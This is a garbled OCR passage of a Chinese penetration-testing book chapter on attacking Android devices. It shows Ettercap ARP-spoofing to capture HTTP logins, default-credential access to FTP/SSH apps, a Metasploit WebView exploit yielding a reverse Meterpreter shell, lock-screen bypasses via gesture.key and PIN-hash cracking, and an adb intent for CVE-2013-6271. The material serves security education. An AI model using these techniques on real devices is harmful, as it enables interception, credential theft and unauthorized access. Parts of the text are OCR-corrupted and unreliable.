很 好 的 例子 ,攻击 者 只 需要 拦截 通讯 ， 并 在 HTTP 响 应 中 注入 任意 的 JavaScript 脚 本， 就 可 以 获取 
受害 者 设备 的 全 部 访问 权限 。 在 本 章 的 后 面部 分 中 ， 我 们 将 讨论 如 何 使 用 Metasploit 框 架 来 利用 


addJavaScriptInterface 漏 洞 ， 达 到 执行 代码 的 目的 。 本 节 将 利用 Ettercap 工 具 来 介绍 互联 网 中 最 古 
老 的 攻击 之 一 一 一 HTTP 通信 拦截 。 


在 第 1 章 中 提 到 ， 读 者 需要 下 载 Kali Linux， 并 安装 在 VirtualBox 或 VMware 中 。 


在 Kali Linux 中 可 以 使 用 Ettercap。 在 进行 后 面 的 操作 之 前 , 使 用 文本 编辑 器 打开 Ettercap 的 本 
置 文 件 ， 如 下 图 所 示 。 













































































:~# vim /etc/ettercap/etter.conf 
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取消 etter.conf 文 件 中 和 iptables 有 关 的 规则 的 注释 ， 如 下 图 所 示 。 





at -A PREROUTING -i % 


-t nat -D PREROUTING -i 


接 下 来 ,我们 需要 找到 网 关 。 可 以 通过 netstat 命 令 找到 网 关 ， 如 下 图 所 示 。 








:-# netstat -nr 
Kernel IP ro MEL Ee le 





本 例 中 的 网 关 地 址 为 192.168.0.1。 
最 后 ， 运 行 Ettercap 进 行 中 间 人 攻击 ， 如 下 图 所 示 。 























上 面 的 命令 对 eth0 接 口 发 起 了 ARP 坎 骗 攻击 。 从 下 图 中 可 以 看 
主机 发 起 中 间 人 攻击 。 


1， 它 会 对 当前 网 络 中 所 有 的 








ARP poisoning 


in the List) 



































如 果 局 域 网 中 的 任意 用 户 通 过 不 安全 的 频道 传输 了 数据 ， 运 行 Bttercap 的 攻击 者 可 以 查看 传 
输 的 数据 。 
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下 图 显示 用 户 打开 了 一 个 HTTP 网 站 ， 并 在 登录 页 面 中 输入 用 户 名 和 密码。 














Login to Way2SMS 


Mobile Number 


9999999999 


Forgot Password? 
Password not Received? 








一 旦 用 户 点 击 了 Login 按 钮 , 攻击 者 就 能 在 Ettercap 终 端 中 查看 用 户 的 登录 信息 , 如 下 图 所 示 。 

















之 前 提 到 ， 攻击 者 可 以 在 HTTP 响 应 中 注入 任意 的 代码 ， 而 是 移动 客户 端 会 运行 这 些 代码 ， 
尤其 是 WebView。 








10.2 来 自 提供 网 络 层 访问 的 应 用 的 威胁 

用 户 经 常 从 应 用 商店 安装 日 常 使 用 的 软件 。 如 果 手 机 安装 了 可 以 通过 网 络 层 访问 安 卓 设备 的 
应 用 , 用 户 必须 注意 哪些 人 可 以 访问 这 些 设 备 ， 以 及 哪些 数据 是 可 以 被 访问 的 。 如 果 用 户 使 用 具 
有 高 级 功能 的 应 用 却 没 有 安全 意识 ， 可 能 会 遇 到 什么 危险 。 下 面 举 一 些 例 子 。 

在 谷歌 Play 商店 中 ， 搜 索 Ftp Server ， 在 排名 靠 前 的 结果 中 有 一 个 包 名 为 com.theolivetree. 
ftpserver 的 Ftp Server 应 用 。 第 1 章 给 出 了 这 个 应 用 的 链接 。 


这 个 应 用 在 未 ROOT 的 设备 上 通过 2221 端 口 提供 FTP 功 能 。 在 编写 本 书 时 ， 这 个 应 用 已 经 被 
下 载 了 五 十 多 万 次 ， 如 下 图 所 示 。 
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Ftp Server 


The Olive Tree 


INSTALL 


a O OO 


Downloads Tools 





Similar 


Ftp Server 














我 们 可 以 查看 应 用 的 功能 , 如 果 你 在 寻找 一 个 可 以 在 你 的 设备 上 实现 fp 功能 的 应 用 , 这 
用 是 一 个 不 错 的 选择 。 局 动 应 用 ， 会 出 现 如 下 图 所 示 的 界面 。 





= Ftp server 


Press button to stop ftp server 


Ftp server available on: 
ftp://192.168.0.107:2221 


Username: francis 
Password: francis 


Anonymous user enabled 
Hama dirantnrw /mnt/edeard 


Download adfree version 








从 上 图 中 可 以 看 到 下 面 这 些 信息 。 


应 用 使 用 的 端口 号 是 2221; 
口 默认 用 户 名 和 密码 为 francis; 
口 匿名 用 户 已 启用 ; 

QO 主 目录 为 /mntsdcard。 








这 个 应 
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现在 , 很 容易 就 可 以 攻击 这 个 应 用 。 如 果 用 户 没 有 修改 应 用 的 默认 设 
镭 取 SD 卡 中 所 有 的 数据 。 

















的 索尼 设备 的 结果 。 























可 以 看 到 ,我们 已 经 匿名 登录 成 功 。 





使 用 nmap 工 具 扫 描 安 卓 设备 的 2221 端 口 ， 可 以 发 现 这 个 端口 是 开启 的 。 下 面 是 扫描 我 使 用 














置 ， 只 需 简 单 几 步 就 能 











使 用 任意 FTP 客 户 端 通过 2221 端 口 连接 这 个 FTP 服 务 器 ， 会 看 到 下 面 的 结果 。 





我 们 再 来 看 一 下 应 用 商店 中 的 另 一 个 应 用 ， 它 为 已 ROOT 过 的 设备 提 人 



































tSSH 服 务 需 的 功能 。 在 


应 用 商店 中 搜索 SSH server， 在 搜索 结果 最 前 面 能 看 到 一 个 包 名 为 berserker.android.apps.sshdroid 的 





ea 


用 。 同 样 ， 这 个 应 用 的 下 载 量 已 经 达到 了 五 十 多 万 次 。 





O R «al @ 14:31 
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SSHDroid 
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, SSHDroid 
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in-app purchases 
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启动 应 用 ， 





查看 应 用 的 选项 








Wy ZB 





设置 。 


从 上 面 的 设置 中 能 看 到 ， 


会 出 现 如 下 











Ta 





Options 


Password 
default: admin 


Home directory 
<default> 


ADVANCED 
Login banner 
Enable or disable the login 


message 


Verbose log 
Enable or disable verbose logging 


User Shell 


<default> 





LINKS 











示 的 选项 。 登 录 提示 默认 是 开启 的 。 








同样 ， 我 们 使 用 nmap 扫 描 22 端 口 ， 它 会 显示 设备 运 





人 码 是 admin。 更 有 趣 的 是 ， 





图 所 示 的 界面 。 下 区 








这 个 应 用 提供 开 


行 了 一 个 SSH 服 务 。 





5 (Sony 


org ) at 2016-05-22 


Mobile Communications 














如 果 你 认为 下 一 步 是 使 用 Hydra 之 类 的 工具 
直接 尝试 不 使 用 用 户 名 和 密码 来 连接 这 











其 力 破 解 用 户 名 和 和 密码， 那 你 想 错 了 。 


文 个 SSH 服 务 ， 你 会 看 到 下 面 的 提示 。 











现在 ， 我 们 获得 了 用 户 名 和 密码 。 接 下 来 ， 直 接 使 用 用 户 名 和 密码 登录 SSH 服 务 器 。:j 


你 就 变 成 了 root 用 户 


o 





这 档 


的 默认 


局 或 关闭 登录 提 


HK 





10.3 FARA HA 243 
































上 面 两 个 例子 只 是 为 了 说 明 为 什么 在 设备 上 使 用 更 多 的 功能 时 , 用 户 需 要 格外 注意 。 在 前 面 
两 个 例子 中 ， 如 果 想 要 获得 更 加 安全 的 移动 体验 ， 用户 需要 注意 以 下 两 点 。 


口 用 户 必须 意识 到 连接 网 络 会 带 来 的 安全 问题 ， 而 且 需 要 采取 一 些 基 本 的 措施 ， 壁 如 修改 
默认 设置 ， 这 是 最 低 要 求 。 
O 如 果 用 户 想 要 使 用 某 些 功能 ， 却 无 法 避免 其 中 的 风险 , 壁 如 匿名 FTP 登 录 , 开发 者 应 该 把 
这 些 安全 风险 告知 用 户 。 
























































10.3 ”利用 现 有 漏洞 


安 卓 设备 上 存在 不 少 漏洞 。 每 当 发 现 一 个 漏洞 , 研究 人 员 会 发 布 漏 洞 ， 并 把 它们 放 在 公开 网 
站 上 ， 比 如 exploit-db.com。 有 些 漏洞 可 以 在 Metasploit 之 类 的 框架 中 使 用 。 有 些 漏洞 可 以 被 远程 利 
用 ,而 男 一 些 可 以 在 本 地 利用 。Stagefright 就 是 其 中 的 一 个 例子 。2015 年 7 月 ,研究员 乔 舒 亚 : 德 
雷 克 在 安 章 的 多 媒体 库 中 发 现 了 一 个 Stagefright 漏 洞 ， 在 当时 引起 了 不 小 的 关注 。 更 多 的 相关 信 
息 参 见 https:/www.exploit-db.com/docs/39527.pdf。 






































类 似 地 ，Webview 的 addJavaScriptInterface 漏 洞 是 到 目前 为 止 发 现 的 最 有 趣 的 远程 漏洞 之 一 。 
FKE, Java 反 射 API 是 通过 WebView JavaScriptbridge 公 开 暴 露 的 ,这 个 漏洞 正 是 利用 了 这 一 点 。 
在 本 节 中 ， 我 们 准备 使 用 Metasploit 框 架 来 诱导 用 户 在 一 个 有 漏洞 的 浏览 器 中 打开 一 个 链接 。 这 
个 漏洞 也 能 通过 中 间 人 攻击 ,在 其 响应 中 注入 恶意 的 JavaScript 脚 本 ,并 诱导 有 漏洞 的 应 用 执行 它 。 
在 API 级 别 不 大 于 16 的 应 用 中 都 存在 该 漏洞 。 下 面 介 绍 如 何 使 用 Metasploit 框 架 执 行 代码 。 


首先 ， 启 动 Metasploit 的 msfconsole， 然 后 查找 webview_addjavascript， 如 下 图 所 示 。 
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从 上 图 中 可 以 看 到 , 在 输出 中 我 们 得 到 了 两 个 不 同 的 模块 。exploit/android/browser/webview_ 
addjavascriptinterface 就 是 我 们 要 找 的 那 一 个 。 


我 们 来 利用 这 个 漏洞 ， 如 下 图 所 示 。 














bview_addj avasc riptinterface 


PAC 
) 





(ay 


漏洞 模块 加 载 完 成 后 ， 我 们 需要 设置 选项 。 首 先 输入 show options 命 令 来 检查 需要 准备 些 
什么 ， 如 下 图 所 示 。 





























从 图 中 可 以 看 到 ，Payload 部 分 只 缺少 LHOST 设 置 。 因 此 ， 我 们 只 需 将 它 补充 完整 。 可 以 通 
过 ifonfig 命 令 找 到 Kaili Linux 计 算 机 的 也 地 址 。 如 下 图 所 示 。 
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本 例 中 的 全 地 址 为 192.168.0.108。 





我 们 将 LHOST 设 置 为 这 个 IP 地 址 ， 如 下 图 所 示 。 




















从 上 图 中 可 以 看 到 ，4444 端 口 运行 了 一 个 用 于 监听 连接 的 反 向 处 理 程序 。 我 们 将 
http://192.168.0.108:8080/eGE7bwFxw8 这 个 链接 发 送 给 受害 者 。 





当 受 害 者 在 包含 该 漏洞 的 浏览 器 中 打开 这 个 链接 时 ,攻击 者 会 得 到 一 个 反 向 shell。 下 图 是 在 
安 卓 4.1 的 内 置 浏览 器 中 打开 这 个 链接 。 





OB «al &@ 13:33 








X 192.168.0.108:8080/eGE7 ”全 





攻击 者 会 得 到 一 个 反 向 shell， 如 下 图 所 示 。 























如 上 图 所 示 ，Meterpreter 会 话 已 经 打开 。 如 果 你 没 看 到 一 个 正常 的 Meterpreter shell， 可 以 返 
回 上 一 个 shell 查 看 已 经 存在 的 会 话 ， 如 下 图 所 示 。 
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从 上 图 中 能 看 到 ,已 经 建立 了 一 个 有 D 为 1 的 会 话 。 现 在 我 们 可 以 与 它 进 行 交互 了 了， 如 下 
图 所 示 。 








现在 ， 我 们 得 到 了 一 个 稳定 的 Meterpreter shell。 我 们 可 以 执行 大 量 的 Meterpreter post 命 令 3 
进行 更 进一步 的 攻击 。 如果 从 一 个 已 ROOT 过 的 设备 上 获得 这 个 shell, 那么 可 以 获得 更 多 的 优势 。 
我 们 可 以 通过 check_root 命 令 查 看 受害 者 的 设备 是 否 已 经 ROOT 过 了 ， 如 下 图 所 示 。 


















































meterpreter > check_root 
[+] Device is rooted 

















从 上 图 中 能 看 出 ， 这 个 设备 已 经 ROOT 过 了 。 我 们 也 可 以 获取 一 个 正常 的 shell 来 运行 标准 的 
Linux 命 令 。 


























如 上 图 所 示 ， 我 们 获取 了 一 个 低 权 限 的 shell， 但 是 由 于 这 个 设备 已 经 ROOT 过 了 ， 我 们 使 用 
su 命令 来 提升 权限 。 如 果 设 备 未 ROOT ， 那 么 我 们 需要 使 用 其 他 技术 ， 比 如 执行 一 个 root 漏 洞 来 
提升 权限 。 























如 果 使 用 了 任意 一 种 传统 的 中 间 人 攻击 手段 ,我 们 就 可 以 在 无 需 用 户 交 互 的 
情况 下 实施 远程 攻击 。 我 们 可 以 利用 通过 WebView JavaScript 接 口 暴露 的 Java 反 
射 API， 来 进行 中 间 人 攻击 ， 并 在 http 响 应 中 注入 恶意 的 JavaScript 脚 本 ， 最 后 运 
行 它 。 注 意 ,只 有 当 应 用 的 API 级 别 不 大 于 16, 且 使 用 了 WebView JavaScript bridge 
时 ， 这 种 方法 才 有 效 。。 


10.4 恶意 软件 


第 9 章 专 门 介 绍 了 安 卓 恶意 软件 。 我 们 发 现 拥有 安 卓 编程 基础 知识 的 恶意 开发 者 就 能 创建 针 
对 安 上 车 平台 的 恶意 软件 。 如 果 攻 击 者 想 要 和 穷 取 用 户 数据 , 或 者 进行 其 他 攻击 , 比如 攻击 安 卓 设备 ， 
利用 恶意 软件 是 他 们 最 常用 的 方式 。 


A 















































10.5 RIME 


与 其 他 大 部 分 设备 一 样 , 安 卓 设 备 也 具有 锁 屏 功能 ,能 够 防止 未 授权 用 户 使 用 设备 ,如 下 图 
所 示 。 














m ax "al = 22:27 


( 六 Select screen lock 


None 


Slide 


Pattern 


PIN 


Password 








安 齐 设备 通常 有 以 下 几 种 锁 屏 方式 。 
口 无 (None ): 无 锁 屏 。 
O 滑动 (Slide ): 滑动 滑 块 解锁 设备 。 

O A (Pattern): 输入 正确 的 连接 多 个 点 的 图 案 解 锁 设 备 。 
O PIN 码 (PIN ): 输入 正确 的 数值 解锁 设备 。 

口 密码 (Password ): 输入 正确 的 密码 解锁 设备 。 


由 于 前 两 种 方式 无 需 额外 的 技巧 就 能 绕 过 锁 屏 , 我 们 将 讨论 一 些 可 以 绕 过 剩 下 三 种 锁 屏 方式 
的 技术 。 

















10.5.1 利用 adab 绕 过 图 案 锁 


| SS 这 种 方式 需要 设备 已 经 ROOT 过 ， 并 且 打 开 了 USB 调 试 。 | 


图 案 锁 是 安 卓 设 备 的 一 种 锁 屏 方式 , 它 需 要 用 户 使 用 正确 的 组 合 来 连接 多 个 点 ,如 下 图 所 示 。 
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dx "al 22:27 


m 


} Choose your pattern 


6 Pattern recorded! 





我 们 可 以 想象 每 个 点 对 应 一 个 数字 ， 如 下 所 示 。 














在 这 种 情况 下 ， 前 面 的 图 案 对 应 的 是 14789。 


当 用 户 设置 图 案 时 , 安 卓 将 输入 图 案 的 散 列 值 存储 到 /data/system 目 录 下 的 gesture.key 文 件 中 。 
这 个 文件 只 有 root 用 户 才 能 访问 ， 因 此 ， 我 们 需要 root 权 限 来 访问 这 个 文件 。 








有 两 种 方式 可 以 在 ROOT 过 的 设备 上 绕 过 图 案 锁 ; 


O 移 除 gesture.key 文 件 ; 
O 拉 取 gesture.key 文 件 ， 并 破解 SHA1 散 列 值 。 





1. 移 除 gesture.key 文 件 
移 除 gesture.key 文 件 很 简单 ， 只 需 从 设备 上 获取 一 个 shell。 进 入 gesture.key 文 件 ， 并 运行 rm 
命令 ， 如 下 图 所 示 。 
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2. 破解 gesture.key 文 件 的 SHA1 散 列 值 
下 面 介绍 如 何 破解 gesture.key 文 件 的 散 列 值 
如 前 文 所 述 ， 当 用 户 设置 好 了 图 案 , 它 会 在 gesture.key 文 件 中 保存 一 个 SHA1 散 列 值 。 只 需 将 








这 个 散 列 值 与 一 个 保存 了 所 有 可 能 的 散 列 值 的 字典 进行 比较 ， 就 能 解决 这 个 问题 。 

















如 果 要 使 用 这 种 方式 ， 首 先 需要 获取 本 地 设备 中 的 gesture.key 文 件 ， 按 照 下 面 的 步骤 进行 操 


YER Ay 


$adb shell 

shell@androidssu 

root@android#cp /data/system/gesture.key /mnt/sdcard 
上 述 命令 会 将 gesture.key 文 件 复制 到 SD 卡 中 。 

然后 ， 使 用 下 面 的 命令 将 这 个 文件 拉 取 到 电脑 中 。 

$adb pull /mnt/sdcard/gesture.key 


接 下 来 ,在 任意 类 Unix 的 设备 中 运行 下 面 的 命令 ， 破 解 文件 中 的 散 列 值 。 


$ grep -i `xxd -p gesture.key` AndroidGestureSHA1.txt 
14789;00 03 06 07 08;C8C0B24A15DC8BBFD411427973574695230458F0 
$ 


从 上 面 的 代码 中 能 看 到 ， 我 们 成 功 破 解 了 图 案 ， 就 是 14789。 
前 面 的 命令 会 检查 AndroidGestureSHA1.txt 文 件 中 与 gesture.key 文 件 中 的 散 列 值 匹 配 的 值 ， 























AndroidGestureSHA1.txt 文 件 保存 了 所 有 可 能 的 SHA1 散 列 值 和 与 之 对 应 的 明文 。 


D, 


下 面 的 shell 脚 本 可 以 执行 相同 的 命令 。 


$ cat findpattern.sh 
grep -i ‘xxd -p gesture.key~ AndroidGestureSHA1.txt 
$ 


你 可 以 将 gesturekey 和 AndroidGestureSHA1.txt 文 件 与 这 个 shell 脚 本 放 在 一 起 ， 然 后 再 运行 
这 会 得 到 相同 的 结 
$ sh findpattern.sh 


14789;00 03 06 07 08;C8C0B24A15DC8BBFD411427973574695230458F0 
$ 


10.5.2 ”使 用 aab 绕 过 密码 或 PIN 码 


| sé 这 种 方法 需要 设备 已 经 ROOT 过 了 ， 而 且 USB 调 试 是 打开 的 。 ] to 





250 第 10 章 ”针对 安 卓 设备 的 攻击 





需要 按照 相同 的 步 又 绕 过 密码 或 者 PIN 码 。 但 是 ， 没 有 前 面 的 图 案 锁 简 单 。 


22:34 


Mon, 8 February 
4g Charging, 99% 


1 2 ABC 3) DEF 


pm 


4 GHI 5 JKL 6 MNO 


7 Pars 8 TuUV 9 wxyz 


0 OK 


MY MAXiSjairtel 


l Emergency call 

















如 果 用 户 创建 了 密码 或 是 PIN 码 , 会 创建 一 个 散 列 值 , 并 保存 到 /data/system 下 的 password.key 
文件 中 。 此 外 , 还 会 生成 一 个 随机 盐 值 ， 并 保存 在 /data/system 路 径 下 的 locksettings.db 文 件 中 。 我 
们 需要 使 用 这 组 散 列 值 和 盐 值 来 暴力 破解 PIN 码 。 

首先 ， 将 password.key 和 locksettings.db 文 件 拉 取出 来 ， 两 个 文件 各 自 的 存放 位 置 如 下 。 

/data/system/password.key 


/data/system/locksettings.key 


RAE T AT gesture.key CEP AY AH IA] ER o 
将 文件 复制 到 SD 卡 。 


# cp /data/system/password.key /mnt/sdcard/ 
# cp /data/system/locksettings.db /mnt/sdcard/ 


从 SD 卡 拉 取 文件 。 


$ adb pull /mnt/sdcard/password.key 
$ adb pull /mnt/sdcard/locksettings.db 


然后 ， 获 取 password.key 文 件 中 的 散 列 值 。 我 们 可 以 使 用 一 个 十 六 进 制 编辑 器 打开 
password.key 文 件 ， 并 获取 散 列 值 ， 如 下 图 所 示 。 
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suas TEST [mm els troleeolsl 
S-~«wS$BE Bn N| E&E Z+- = 7 % Kk Pl] At alg (a E x 








3737 3246 3543 3444 3637[52E5F4772F5C4D67 
3232 4143 4639 3634 3230 |8BE79722ACF96420 
3644 4338 3741 3732 3441/A12ED86DC87A724A 
4433 4541 3035 4544 3736 |5AE7A0D3EA05ED76 
3632 791CE362 

















使 用 SQLite3 命 令 行 工 具 打 开 locksettings.db 文 件 ， 并 获取 盐 值 。 
盐 值 保存 在 locksettings 表 中 ， 从 lockscreen.password_salt 条 目 中 可 以 找到 它 。 


$ sqlite3 locksettings.db 

SQLite version 3.8.5 2014-08-15 22:37:57 
Enter ".help" for usage hints. 

sqlite> .tables 

android_metadata locksettings 

sqlite> select * from locksettings; 
2|migrated|0|true 
6|lock_pattern_visible_pattern|0|/1 
7|lock_pattern_tactile_feedback_enabled|01|0 
12|lockscreen.password_salt|0]/6305598215633793568 
17|lockscreen.passwordhistory]|0| 
24|lockscreen.patterneverchosen|0/1 
27|lock_pattern_autolock|010 
28|lockscreen.password_type|l010 
29|lockscreen.password_type_alternate|0/0 
30|lockscreen.disabled|0/0 

sqlite> 


现在 得 到 了 散 列 值 和 盐 值 ， 我 们 需要 使 用 这 两 个 值 ， 并 通过 暴力 破解 方式 得 到 PIN 码 。 


http:/www.cclgroupltd.com 上 的 网 友 已 经 编写 了 一 个 很 不 错 的 Python 脚本 , 能 够 使 用 散 列 值 和 
盐 值 暴力 破解 PIN 码 。. 可 以 从 下 面 的 链接 下 载 这 个 脚本 ,而 且 它 还 是 免费 的 :http:/www.cclgroupltd. 
com/product/android-pin-password-lock-tool/。 




















使 用 BruteForceAndroidPin.py 文 件 ， 并 运行 下 面 的 命令 。 
Python BruteForceAndroidPin.py [hash] [salt] [max_length_of_PIN] 


运行 上 述 命 令 会 得 到 PIN 码 ， 如 下 图 所 示 。 
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srini's MacBook:RecoverAndroidPin sriniðxðð$ python BruteForceAndroidPin.py 52E5F4772F5C 
40678BE79722ACF96420A12ED860C87A724A5AE7AQD3EA@5ED76791CE362 6305598215633793568 5 
Passcode: 0978 

srini's MacBook:RecoverAndroidPin srini@x0es 目 











破解 PIN 码 的 时 间 取 决 于 用 户 设置 PIN 码 的 复杂 程度 。 








10.5.3 利用 CVE-2013-6271 漏洞 绕 过 锁 屏 


| 这 一 技术 只 适用 于 安 上 车 4.4 之 前 的 版 本 。 虽然 必须 打开 USB 调 试 ， 但 无 需 root 
> 权限 。 





2013 年 ，Curesec 公 开 了 一 个 漏洞 ， 它 能 在 无 需 用 户 交 互 的 情况 下 清除 安 卓 设备 的 锁 屏 。 实 
际 上 ， 这 利用 了 com.andaroidq.settings.chooseLockGeneric 类 中 的 一 个 漏洞 。 用 户 可 以 发 
送 一 个 Intent 来 禁用 所 有 的 锁 屏 功能 。 











$ adb shell am start -n com.android.settings/com.android.settings. 
ChooseLockGeneric --ez confirm_credentials false --ei lockscreen. 
password_type 0 --activity-clear-task 


运行 上 面 的 命令 将 会 禁用 锁 屏 。 





10.6 MSD 卡拉 取 数 据 


如 果 设 备 开 启 了 USB 调 试 ， 我 们 就 能 从 设备 拉 取 数据 到 电脑 。 如 果 设 备 没有 被 ROOT ， 我 们 
同样 能 从 SD 卡拉 取 数 据 ， 如 下 所 示 。 


$ adb shell 

shell@e73g:/ $ cd /sdcard/ 
shell@e73g:/sdcard $ ls 
Android 

CallRecordings 

DCIM 

Download 

Galaxy Note 3 Wallpapers 
HyprmxShared 

My Documents 

Photo Grid 

Pictures 

Playlists 

Ringtones 

SHAREit 

Sounds 

Studio 

whatsApp 

XiaoYing 

_ chartboost 
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bobble 
com.flipkart.android 
data 

domobile 

gamecfg 

gameloft 

media 

netimages 

postitial 

roidapp 
shell@e73g:/sdcard $ 


我 们 使 用 aab 从 未 ROOT 的 设备 获取 了 一 个 shell， 进 入 sdcard 文 件 夹 ， 可 以 列 出 里 面 的 内 容 。 
这 表明 我 们 拥有 查看 sdcard 文 件 夹 中 内 容 的 权限 。 此 外 ， 下 面 的 代码 显示 我 们 还 能 从 sdcard 文 件 
夹 拉 取 文件 ， 而 且 无 需 额外 的 权限 。 

$ adb pull /mnt/sdcard/Download/cacert.crt 

62 KB/s (712 bytes in 0.011s) 

$ ls cacert.crt 


cacert.crt 


$ 
从 上 面 的 代码 中 能 看 出 ，cacert.crt 文 件 已 经 被 拉 取 到 了 计算 机 。 


10.7 小结 
在 本 章 中 , 我 们 看 到 了 针对 安 卓 设备 的 攻击 是 多 么 常见 。 本 章 介 绍 了 一 些 常见 的 攻击 ， 比 如 


中 间 人 攻击 。 注 意 ， 它们 同样 可 以 攻击 移动 设备 。 安 装 提供 网 络 层 访问 的 应 用 时 ,用 户 必 须 格外 
小 心 。 最 重要 的 是 ， 用 户 必 须 定期 升级 设备 ， 以 避免 被 攻击 ， 比 如 针对 WebView 的 攻击 。 
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